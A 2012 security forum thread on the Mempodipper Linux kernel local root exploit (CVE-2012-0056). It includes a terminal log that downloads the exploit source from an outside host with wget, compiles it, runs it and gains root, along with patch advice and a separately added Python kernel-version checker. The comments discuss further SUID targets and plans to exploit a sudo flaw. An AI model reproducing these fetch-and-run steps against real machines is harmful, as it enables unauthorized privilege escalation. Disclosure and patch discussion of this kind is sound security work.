
Linux Local Root Via SUID /prod/pid/mem Write

  • 28-01-2012 6:57pm
    #1
    Closed Accounts Posts: 2,267 ✭✭✭


    This is the Mempodipper local root exploit for Linux. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process's virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that prevented write support for writing to arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels greater than or equal to 2.6.39 are vulnerable.
    http://packetstormsecurity.org/files/108973

    Fresh install of Linux Mint 12, then updated to latest repository sources using:
    sudo apt-get update
    sudo apt-get upgrade

    damo@damo-XPS-M1530 ~ $ uname -a
    Linux damo-XPS-M1530 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
    damo@damo-XPS-M1530 ~ $ whoami
    damo
    damo@damo-XPS-M1530 ~ $ id
    uid=1000(damo) gid=1000(damo) groups=1000(damo),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),125(sambashare)
    damo@damo-XPS-M1530 ~ $ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
    --2012-01-28 17:32:14-- http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
    Resolving git.zx2c4.com... 173.236.178.65, 2607:f298:2:122::2e0:9c2
    Connecting to git.zx2c4.com|173.236.178.65|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 7069 (6.9K) [text/plain]
    Saving to: `mempodipper.c'

    100%[===================================================================>] 7,069 36.0K/s in 0.2s

    2012-01-28 17:32:15 (36.0 KB/s) - `mempodipper.c' saved [7069/7069]

    damo@damo-XPS-M1530 ~ $ gcc mempodipper.c -o mempodipper
    damo@damo-XPS-M1530 ~ $ ./mempodipper
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Ptracing su to find next instruction without reading binary.
    [+] Creating ptrace pipe.
    [+] Forking ptrace child.
    [+] Waiting for ptraced child to give output on syscalls.
    [+] Ptrace_traceme'ing process.
    [+] Error message written. Single stepping to find address.
    [+] Resolved call address to 0x8049570.
    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/2791/mem in child.
    [+] Sending fd 6 to parent.
    [+] Received fd at 6.
    [+] Assigning fd 6 to stderr.
    [+] Calculating su padding.
    [+] Seeking to offset 0x8049564.
    [+] Executing su with shellcode.
    # id
    uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),125(sambashare),1000(damo)
    # whoami
    root
    #


    Running apt-get upgrade again:
    damo@damo-XPS-M1530 ~ $ sudo apt-get upgrade
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following packages have been kept back:
    linux-generic linux-headers-generic linux-image-generic
    0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.
    damo@damo-XPS-M1530 ~ $

    However, you can upgrade your kernel by executing:
    sudo apt-get dist-upgrade
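    A quick version-window check for the kernel range the post describes (>= 2.6.39). This is an added example, not part of the original post or the exploit's code; it assumes stable release 3.2.2 as the first upstream release carrying the /proc/pid/mem fix (the thread only says "just patched"), and it treats the Ubuntu/Mint "-12-generic" suffix as a distro ABI tag to be ignored.

```python
"""Classify a 'uname -r' string against the CVE-2012-0056 (Mempodipper) window.

Write support to /proc/pid/mem appeared in 2.6.39 (from the thread); the fix
shipped upstream in 3.2.2 (assumption stated in the lead-in). Distro kernels
backport fixes without changing the upstream version, so a hit means "check
the vendor changelog / run dist-upgrade", not "definitely vulnerable".
"""
import platform
import re

FIRST_AFFECTED = (2, 6, 39)   # /proc/pid/mem write support enabled here
UPSTREAM_FIXED = (3, 2, 2)    # assumed first upstream release with the fix


def parse_release(release: str) -> tuple:
    """Turn '3.0.0-12-generic' into (3, 0, 0).

    Only the leading dotted numeric part is compared; the '-12-generic'
    ABI/flavour suffix is ignored. A missing patch level counts as 0,
    so '3.2' parses as (3, 2, 0).
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def in_affected_window(release: str) -> bool:
    """True if the upstream version is >= 2.6.39 and < 3.2.2."""
    return FIRST_AFFECTED <= parse_release(release) < UPSTREAM_FIXED


def assess(release: str) -> str:
    """Human-readable verdict for one release string."""
    if in_affected_window(release):
        return (f"{release}: inside the CVE-2012-0056 window; confirm whether "
                "your distro backported the /proc/pid/mem fix (e.g. apt-get dist-upgrade)")
    return f"{release}: upstream version outside the CVE-2012-0056 window"


if __name__ == "__main__":
    # Constructed samples: the Mint 12 kernel from the thread, an older
    # kernel predating write support, and a release carrying the fix.
    for sample in ("3.0.0-12-generic", "2.6.32-5-amd64", "3.2.2"):
        print(assess(sample))
    print(assess(platform.release()))   # the machine this runs on
```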


Comments

  • Registered Users Posts: 126 ✭✭infodox


    I have had a python version of this for a while, nice to know the "real" version was released. The .py version relies on an unusual python module that most installs are missing :/

    This was just patched BTW, in the latest kernel sources. I dunno why the author finally released, he was planning on sitting on it for AGES.

    There is also an nginx remote in the wild (0day, waiting on a sample) so take care!


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    infodox wrote: »
    This was just patched BTW, in the latest kernel sources.

    Aye, that's why I was saying you can update your kernel above ;)


  • Registered Users Posts: 126 ✭✭infodox


    Oddly enough, exploit only works on "new but not newest" kernels. Which is REALLY unusual, but after reading the information on the exploit before a PoC was made public it makes sense - the removal of a couple of #ifdefs rendered that "interface" vuln to this.

    su is not the only binary vuln either, there are a few SUID binaries that this can work on... I am betting passwd is vuln because it behaves the same, not sure if ASLR is enabled on the .text section in it either :)


  • Registered Users Posts: 126 ✭✭infodox


    http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt

    Working on an exploit tonight... Should have something by Wednesday :)



  • Registered Users Posts: 8,811 ✭✭✭BaconZombie


    Look like there is a bounty open already:

    @joernchen

    Bug Bounty: 1 crate of beer for the first reliable exploit for CVE-2012-0809 (sudo 1.8 format string) WITH FORTIFY_SOURCE & ASLR enabled :-)

    https://twitter.com/#!/joernchen/status/164038779743645696
    infodox wrote: »
    http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt

    Working on an exploit tonight... Should have something by Wednesday :)

